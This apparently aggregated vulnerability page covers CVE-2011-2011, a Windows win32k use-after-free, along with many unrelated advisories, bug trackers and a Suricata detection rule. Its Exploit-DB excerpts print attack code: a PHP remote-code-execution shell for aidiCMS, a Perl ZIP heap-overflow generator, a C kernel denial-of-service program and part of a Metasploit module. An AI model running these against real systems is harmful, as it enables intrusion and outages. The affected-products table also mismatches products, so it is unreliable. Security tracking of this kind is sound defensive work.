CVE-2011-2011
published 2011-10-12CVE-2011-2011: Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows…
PriorityP433high7.2CVSS 2.0
AVLACLAuNCCICAC
EPSS
1.79%
76.2th percentile
Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability."
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
| qooxdoo | qooxdoo | 0 – 1.3 | — |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat9.1CRITICAL
vendor_cisco5.0MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
QooxDoo XSS in Callback Parameter
ghsa·2022-05-17
CVE-2011-1714 [MEDIUM] CWE-79 QooxDoo XSS in Callback Parameter
QooxDoo XSS in Callback Parameter
Cross-site scripting (XSS) vulnerability in `framework/source/resource/qx/test/jsonp_primitive.php` in QooxDoo 1.3 and possibly other versions, as used in eyeOS 2.2 and 2.3, and possibly other products allows remote attackers to inject arbitrary web script or HTML via the callback parameter.
GHSA
Improper Input Validation in Jetty
ghsa·2022-05-14
CVE-2011-4461 [MEDIUM] CWE-20 Improper Input Validation in Jetty
Improper Input Validation in Jetty
Jetty 8.1.0.RC2 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
GHSA
GHSA-8xc3-g2x5-wjx3: Use-after-free vulnerability in win32k
ghsa_unreviewed·2022-05-13
CVE-2011-2011 [HIGH] GHSA-8xc3-g2x5-wjx3: Use-after-free vulnerability in win32k
Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, aka "Win32k Use After Free Vulnerability."
Red Hat
Mozilla: Possible XSS via HTTP 0.9 errors and content-sniffing
vendor_redhat·2011-11-09·CVSS 6.1
CVE-2011-3656 [MEDIUM] CWE-79 Mozilla: Possible XSS via HTTP 0.9 errors and content-sniffing
Mozilla: Possible XSS via HTTP 0.9 errors and content-sniffing
Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.6.24 and 4.x through 7 allows remote attackers to inject arbitrary web script or HTML via vectors involving HTTP 0.9 errors, non-default ports, and content-sniffing.
Package: firefox (Red Hat Enterprise Linux 4) - Affected
Package: seamonkey (Red Hat Enterprise Linux 4) - Affected
Package: thunderbird (Red Hat Enterprise Linux 4) - Affected
Package: firefox (Red Hat Enterprise Linux Extended Update Support 5.7) - Affected
Package: thunderbird (Red Hat Enterprise Linux Extended Update Support 5.7) - Affected
Package: firefox (Red Hat Enterprise Linux Extended Update Support 6.1) - Affected
Package: thunderbird (Red Hat Enterprise Linux Extended Update S
Red Hat
BSD compress LZW decoder buffer overflow
vendor_redhat·2011-08-10·CVSS 7.5
CVE-2011-2895 [HIGH] BSD compress LZW decoder buffer overflow
BSD compress LZW decoder buffer overflow
The LZW decompressor in (1) the BufCompressedFill function in fontfile/decompress.c in X.Org libXfont before 1.4.4 and (2) compress/compress.c in 4.3BSD, as used in zopen.c in OpenBSD before 3.8, FreeBSD, NetBSD 4.0.x and 5.0.x before 5.0.3 and 5.1.x before 5.1.1, FreeType 2.1.9, and other products, does not properly handle code words that are absent from the decompression table when encountered, which allows context-dependent attackers to trigger an infinite loop or a heap-based buffer overflow, and possibly execute arbitrary code, via a crafted compressed stream, a related issue to CVE-2006-1168 and CVE-2011-2896.
Package: busybox (Red Hat Enterprise Linux 4) - Not affected
Package: gzip (Red Hat Enterprise Linux 4) - Not affected
Package: mai
Red Hat
kernel: net: improve sequence number generation
vendor_redhat·2011-08-07·CVSS 9.1
CVE-2011-3188 [CRITICAL] kernel: net: improve sequence number generation
kernel: net: improve sequence number generation
The (1) IPv4 and (2) IPv6 implementations in the Linux kernel before 3.1 use a modified MD4 algorithm to generate sequence numbers and Fragment Identification values, which makes it easier for remote attackers to cause a denial of service (disrupted networking) or hijack network sessions by predicting these values and sending crafted packets.
Statement: This issue affects the Linux kernel as shipped with Red Hat Enterprise Linux 4, 5, 6, and Red Hat Enterprise MRG. It has been addressed in Red Hat Enterprise Linux 5, 6, and Red Hat Enterprise MRG via https://rhn.redhat.com/errata/RHSA-2011-1386.html, https://rhn.redhat.com/errata/RHSA-2011-1465.html, and https://rhn.redhat.com/errata/RHSA-2012-0010.html. Red Hat Enterprise Linux 4 is now in
Cisco
Cisco RVS4000 and WRVS4400N Gigabit Security Routers Firmware SSL Key Disclosure Vulnerability
vendor_cisco·2011-05-25·CVSS 5.0
CVE-2011-1647 [MEDIUM] CWE-200 Cisco RVS4000 and WRVS4400N Gigabit Security Routers Firmware SSL Key Disclosure Vulnerability
Cisco RVS4000 and WRVS4400N Gigabit Security Routers Firmware SSL Key Disclosure Vulnerability
The firmware of Cisco RVS4000 4-port Gigabit Security Routers and WRVS4400N Wireless-N Gigabit Security Routers contains a vulnerability that could allow an unauthenticated, remote attacker to access sensitive information from a targeted device.
The vulnerability is due to improper security protections on SSL certificate private keys on affected devices. An unauthenticated, remote could exploit this vulnerability to retrieve SSL certificate key information from a targeted device. If successful, the attacker could access sensitive information that could be used in further attacks.
Cisco has confirmed this vulnerability and has released updated software.
Unless remote management capabilities are
Red Hat
kernel: DoS (crash) due slab corruption in inotify_init1 (incomplete fix for CVE-2010-4250)
vendor_redhat·2011-04-05·CVSS 4.9
CVE-2011-1479 [MEDIUM] kernel: DoS (crash) due slab corruption in inotify_init1 (incomplete fix for CVE-2010-4250)
kernel: DoS (crash) due slab corruption in inotify_init1 (incomplete fix for CVE-2010-4250)
Double free vulnerability in the inotify subsystem in the Linux kernel before 2.6.39 allows local users to cause a denial of service (system crash) via vectors involving failed attempts to create files. NOTE: this vulnerability exists because of an incorrect fix for CVE-2010-4250.
Statement: This issue did not affect the versions of Linux kernel as shipped with Red Hat
Enterprise Linux 4 and 5. This has been addressed in Red Hat Enterprise Linux 6 and Red Hat Enterprise MRG via https://rhn.redhat.com/errata/RHSA-2011-0498.html and https://rhn.redhat.com/errata/RHSA-2011-1253.html.
Package: kernel (Red Hat Enterprise Linux 6) - Affected
Package: kernel (Red Hat Enterprise Linux Extended Update Su
Red Hat
389: replica crashes due to empty modify request when built with mozldap
vendor_redhat·2011-02-15·CVSS 5.9
CVE-2011-0704 [MEDIUM] 389: replica crashes due to empty modify request when built with mozldap
389: replica crashes due to empty modify request when built with mozldap
389 Directory Server 1.2.7.5, when built with mozldap, allows remote attackers to cause a denial of service (replica crash) by sending an empty modify request.
Statement: Not vulnerable. This issue did not affect Red Hat Directory Server 8 packages.
Suricata
ET WEB_SPECIFIC_APPS Possible ZOHO ManageEngine ADSelfService Captcha Bypass Attempt
suricata·2011-06-09
CVE-2010-3272 ET WEB_SPECIFIC_APPS Possible ZOHO ManageEngine ADSelfService Captcha Bypass Attempt
ET WEB_SPECIFIC_APPS Possible ZOHO ManageEngine ADSelfService Captcha Bypass Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Possible ZOHO ManageEngine ADSelfService Captcha Bypass Attempt"; flow:established,to_server; http.method; content:"POST"; nocase; http.uri; content:"/accounts/ValidateAnswers?methodToCall=validateAll"; nocase; fast_pattern; http.request_body; content:"&Hide_Captcha=0"; nocase; content:"&LOGIN_NAME="; nocase; distance:0; content:"&quesList="; nocase; distance:0; reference:url,www.coresecurity.com/content/zoho-manageengine-vulnerabilities; reference:cve,2010-3272; classtype:web-application-attack; sid:2012979; rev:4; metadata:created_at 2011_06_09, cve CVE_2010_3272, confidence Medium, signature_severity Major, updated_at 2020_1
Exploit-DB
Microsoft Terminal Services - Use-After-Free (MS12-020)
exploitdb·2012-03-16
CVE-2012-0002 Microsoft Terminal Services - Use-After-Free (MS12-020)
Microsoft Terminal Services - Use-After-Free (MS12-020)
---
#######################################################################
Luigi Auriemma
Application: Microsoft Terminal Services / Remote Desktop Services
http://www.microsoft.com
http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx
Versions: any Windows version before 13 Mar 2012
Platforms: Windows
Bug: use after free
Exploitation: remote, versus server
Date: 16 Mar 2012 (found 16 May 2011)
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
Additional references:
http://www.zerodayinitiative.com/advisories/ZDI-12-044/
http://technet.microsoft.com/en-us/security/bulletin/ms12-020
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
##
Exploit-DB
aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution
exploitdb·2011-11-05
CVE-2011-4825 aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution
aidiCMS 3.55 - 'ajax_create_folder.php' Remote Code Execution
---
\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /aidicms/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=";
$packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\naidicms-shell#
Exploit-DB
Joomla! Component HM Community - Multiple Vulnerabilities
exploitdb·2011-10-31
CVE-2011-4809 Joomla! Component HM Community - Multiple Vulnerabilities
Joomla! Component HM Community - Multiple Vulnerabilities
---
_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_
_____0______0______0__0______0___0__0________0___0__00000__0___0_
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_
# [+] Joomla Compenent com_hmcommunity Multiple Vulnerabilities
# [+] Software : Joomla
# [+] Download : http://joomlaextensions.co.in/product/HM-Community
# [+] Author : 599eme Man
# [+] Contact : [email protected]
#
#[------------------------------------------------------------------------------------]
#
# [+] Vulnerabilities
#
# [+] SQL
#
# - http://site.com/index.php?option=com_hmcommunity&view=fnd_ho
Exploit-DB
Chyrp 2.x - '/includes/JavaScript.php?action' Cross-Site Scripting
exploitdb·2011-07-13
CVE-2011-2743 Chyrp 2.x - '/includes/JavaScript.php?action' Cross-Site Scripting
Chyrp 2.x - '/includes/JavaScript.php?action' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
http://www.example.comincludes/javascript.php?action=[XSS]
Exploit-DB
ZipItFast 3.0 - '.zip' Heap Overflow
exploitdb·2011-07-08
ZipItFast 3.0 - '.zip' Heap Overflow
ZipItFast 3.0 - '.zip' Heap Overflow
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipItFast v3.0 .ZIP File Heap Overflow Exploit
#[+]Date: 08\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.freewarefiles.com/ZipItFast---Zip-It-Free-V_program_22803.html
#[+]Version: v3.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipItFast v3.0 .ZIP File Heap Overflow Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
sleep(2);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02\x14\x0
Exploit-DB
Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service
exploitdb·2011-03-02
CVE-2011-1083 Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service
Linux Kernel 2.6.x - epoll Nested Structures Local Denial of Service
---
/*
source: https://www.securityfocus.com/bid/46630/info
The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users.
*/
#include
#include
int main(void) {
int e1, e2, p[2];
struct epoll_event evt = {
.events = EPOLLIN
};
e1 = epoll_create(1);
e2 = epoll_create(2);
pipe(p);
epoll_ctl(e2, EPOLL_CTL_ADD, e1, &evt);
epoll_ctl(e1, EPOLL_CTL_ADD, p[0], &evt);
write(p[1], p, sizeof p);
epoll_ctl(e1, EPOLL_CTL_ADD, e2, &evt);
return 0;
}
Exploit-DB
Signed Applet Social Engineering - Code Execution (Metasploit)
exploitdb·2011-01-08·CVSS 10.0
CVE-2008-5353 [CRITICAL] Signed Applet Social Engineering - Code Execution (Metasploit)
Signed Applet Social Engineering - Code Execution (Metasploit)
---
##
# $Id: java_signed_applet.rb 11516 2011-01-08 01:13:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
class Metasploit3 'Signed Applet Social Engineering Code Exec',
'Description' => %q{
This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it
to a .jar file, then signs the .jar with a dynamically created certificate containing
values of your choosing. This is presented to the end user via a web page with an applet
tag, loading the sig
Bugzilla
CVE-2011-4601 pidgin (libpurple): Invalid UTF-8 string handling in OSCAR messages
bugzilla·2011-12-08·CVSS 5.0
CVE-2011-4601 [MEDIUM] CVE-2011-4601 pidgin (libpurple): Invalid UTF-8 string handling in OSCAR messages
CVE-2011-4601 pidgin (libpurple): Invalid UTF-8 string handling in OSCAR messages
An out-of heap-based buffer read flaw was found in the way OSCAR (Open System for CommunicAtion in Realtime) protocol plug-in of Pidgin, a Gtk+ based multiprotocol instant messaging client, processed authorization denied messages, containing non-UTF-8 sequences. If a rogue server sent a specially-crafted authorization denied message, it could lead to denial of service (Pidgin crash).
Reference:
http://pidgin.im/news/security/?id=57
Patch: http://developer.pidgin.im/viewmtn/revision/info/757272a78a8ca6027d518e614712c3399e34dda3
Discussion:
This issue affects the versions of the pidgin package, as shipped with Red Hat Enterprise Linux 4, 5, and 6.
--
This issue affects the versions of the pidgin package,
Bugzilla
CVE-2011-4349 colord: Multiple SQL injection flaws in database routines processing color device mappings and devices
bugzilla·2011-11-25·CVSS 4.6
CVE-2011-4349 [MEDIUM] CVE-2011-4349 colord: Multiple SQL injection flaws in database routines processing color device mappings and devices
CVE-2011-4349 colord: Multiple SQL injection flaws in database routines processing color device mappings and devices
Multiple SQL injection flaws were found in the way colord, a color daemon that maps color devices to color profiles in the system context, performed SQL queries sanitization in database routines processing color device mappings and devices. If a local user was allowed to create new devices, and colord daemon was run as root, a local attacker could use this flaw to corrupt colord's own database or potentially other system SQLite3 based and related databases (for example that, used by polkit daemon).
References:
[1] https://bugs.freedesktop.org/show_bug.cgi?id=42904
[2] https://bugzilla.novell.com/show_bug.cgi?id=698250
[3] http://www.openwall.com/lists/oss-security/2011/11/
Bugzilla
CVE-2011-4885 php: hash table collisions CPU usage DoS (oCERT-2011-003)
bugzilla·2011-11-01·CVSS 5.0
CVE-2011-4885 [MEDIUM] CVE-2011-4885 php: hash table collisions CPU usage DoS (oCERT-2011-003)
CVE-2011-4885 php: hash table collisions CPU usage DoS (oCERT-2011-003)
Julian Wälde and Alexander Klink reported a flaw in the hash function used in the implementation of the PHP arrays. PHP arrays are implemented using the hash table that maps keys to values:
http://www.php.net/manual/en/language.types.array.php
A specially-crafted set of keys could trigger hash function collisions, which degrade hash table performance by changing hash table operations complexity from an expected/average O(1) to the worst case O(n). Reporters were able to find colliding strings efficiently using equivalent substrings or meet in the middle techniques.
As PHP automatically pre-fills certain arrays (such as $_POST, $_GET, or $_COOKIE) with data from the HTTP request before executing a script, a remote at
Bugzilla
CVE-2011-3557 OpenJDK: RMI registry privileged code execution (RMI, 7083012)
bugzilla·2011-10-12·CVSS 6.8
CVE-2011-3557 [MEDIUM] CVE-2011-3557 OpenJDK: RMI registry privileged code execution (RMI, 7083012)
CVE-2011-3557 OpenJDK: RMI registry privileged code execution (RMI, 7083012)
It was discovered that RMI Registry implementation in OpenJDK did not properly restrict privileges of remotely executed code. A remote RMI client could use this flaw to execute code on the server with elevated privileges.
Discussion:
External References:
http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 6
Red Hat Enterprise Linux 5
Via RHSA-2011:1380 https://rhn.redhat.com/errata/RHSA-2011-1380.html
---
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 6
Supplementary for Red Hat Enterprise Linux 5
Extras for RHEL 4
Via RHSA-2011:1384 https://rhn.red
Bugzilla
CVE-2011-2895 libXfont: LZW decompression heap corruption / infinite loop [fedora-all]
bugzilla·2011-08-11·CVSS 9.3
CVE-2011-2895 [CRITICAL] CVE-2011-2895 libXfont: LZW decompression heap corruption / infinite loop [fedora-all]
CVE-2011-2895 libXfont: LZW decompression heap corruption / infinite loop [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=725760
Please note: this issue affe
Bugzilla
CVE-2011-2526 tomcat: security manager restrictions bypass
bugzilla·2011-07-13·CVSS 4.4
CVE-2011-2526 [MEDIUM] CVE-2011-2526 tomcat: security manager restrictions bypass
CVE-2011-2526 tomcat: security manager restrictions bypass
The Tomcat sendfile support (when HTTP APR or HTTP NIO connectors are enabled) allows to send large static files. These writes, as soon as the system load increases, will be performed asynchronously in the most efficient way.
It was found that Tomcat, the Apache Servlet/JSP Engine, did not properly sanitize arguments provided to sendfile call methods, when a web application was running under the security manager:
1) such application could use the sendfile support to expose server files, that should be made inaccessible by the security manager,
2) when HTTP APR/native connector was used, such application could specify invalid sendfile start/end points and trigger a JVM crash.
Discussion:
Public now via:
[1] http://tomcat.apache.
Bugzilla
CVE-2011-1499 CVE-2011-1843 tinyproxy: multiple flaws corrected in version 1.8.3 [epel-all]
bugzilla·2011-05-03·CVSS 2.6
CVE-2011-1499 [LOW] CVE-2011-1499 CVE-2011-1843 tinyproxy: multiple flaws corrected in version 1.8.3 [epel-all]
CVE-2011-1499 CVE-2011-1843 tinyproxy: multiple flaws corrected in version 1.8.3 [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=694658
Please note: this issue
Bugzilla
CVE-2011-1593 kernel: proc: signedness issue in next_pidmap()
bugzilla·2011-04-19·CVSS 4.9
CVE-2011-1593 [MEDIUM] CVE-2011-1593 kernel: proc: signedness issue in next_pidmap()
CVE-2011-1593 kernel: proc: signedness issue in next_pidmap()
A signedness issue has been found in next_pidmap() function when the "last"
parameter is negative as next_pidmap() just quietly accepted whatever
"last" pid that was passed in, which is not all that safe when one of the
users is /proc.
Setting f_pos to negative value when accessing /proc via readdir()/getdents()
resulted in sign extension of this value when map pointer was being
constructed.
This later lead to #GP becasue the final pointer was not cannonical (x86_64).
map = &pid_ns->pidmap[(last + 1)/BITS_PER_PAGE];
ffffffff810ac3b4: 48 63 f6 movslq %esi,%rsi page))
ffffffff810ac3cc: 48 8b 7b 08 mov 0x8(%rbx),%rdi <- #GP
Only x86_64 architecture seems to be vulnerable to this particular issue
(tested ppc64, s390x, ia64).
R
Bugzilla
CVE-2011-1496 tmux does not drop group tmux privileges properly [fedora-all]
bugzilla·2011-04-07·CVSS 4.6
CVE-2011-1496 [MEDIUM] CVE-2011-1496 tmux does not drop group tmux privileges properly [fedora-all]
CVE-2011-1496 tmux does not drop group tmux privileges properly [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=693824
Please note: this issue affects multip
Bugzilla
CVE-2011-4922 Cipher API information disclosure in pidgin
bugzilla·2011-03-14·CVSS 2.1
CVE-2011-4922 [LOW] CVE-2011-4922 Cipher API information disclosure in pidgin
CVE-2011-4922 Cipher API information disclosure in pidgin
It was discovered that libpurple versions prior to 2.7.10
do not properly clear certain data structures used in libpurple/cipher.c
prior to freeing.
An attacker could potentially extract partial information from memory
regions freed by libpurple.
References:
http://pidgin.im/news/security/?id=50
This is fixed in pidgin version 2.7.10
Discussion:
Created pidgin tracking bugs for this issue
Affects: fedora-all [bug 684120]
---
CVE Request:
[2] http://www.openwall.com/lists/oss-security/2011/03/21/6
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 6
Via RHSA-2011:0616 https://rhn.redhat.com/errata/RHSA-2011-0616.html
---
This issue has been addressed in following products:
Red Hat Enterpr
Bugzilla
CVE-2010-4471 OpenJDK Java2D font-related system property leak (6985453)
bugzilla·2011-02-08·CVSS 5.0
CVE-2010-4471 [MEDIUM] CVE-2010-4471 OpenJDK Java2D font-related system property leak (6985453)
CVE-2010-4471 OpenJDK Java2D font-related system property leak (6985453)
A vulnerability was discovered in the 2D subcomponent. Exceptions thrown when processing broken CFF fonts could leak system property values.
This issue (CVE-2010-4471) is not exploitable when using OpenJDK on Red Hat
Enterprise Linux 5 and 6; however, the fix was added as a defense in depth.
Discussion:
This issue has been addressed in following products:
Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6
Extras for RHEL 4
Via RHSA-2011:0282 https://rhn.redhat.com/errata/RHSA-2011-0282.html
---
This issue has been addressed in following products:
Red Hat Enterprise Linux 5
Red Hat Enterprise Linux 6
Via RHSA-2011:0281 https://rhn.redhat.com/errata/RHSA-2011-0281.html
-
Bugzilla
CVE-2011-0495 Asterisk: Stack-based buffer overflow by forming an outgoing SIP request with specially-crafted caller ID information (AST-2011-001) [fedora-all]
bugzilla·2011-01-19·CVSS 6.0
CVE-2011-0495 [MEDIUM] CVE-2011-0495 Asterisk: Stack-based buffer overflow by forming an outgoing SIP request with specially-crafted caller ID information (AST-2011-001) [fedora-all]
CVE-2011-0495 Asterisk: Stack-based buffer overflow by forming an outgoing SIP request with specially-crafted caller ID information (AST-2011-001) [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.
http://www.securityfocus.com/bid/49981http://www.securitytracker.com/id?1026165https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-077https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12904http://www.securityfocus.com/bid/49981http://www.securitytracker.com/id?1026165https://docs.microsoft.com/en-us/security-updates/securitybulletins/2011/ms11-077https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12904
2011-10-12
Published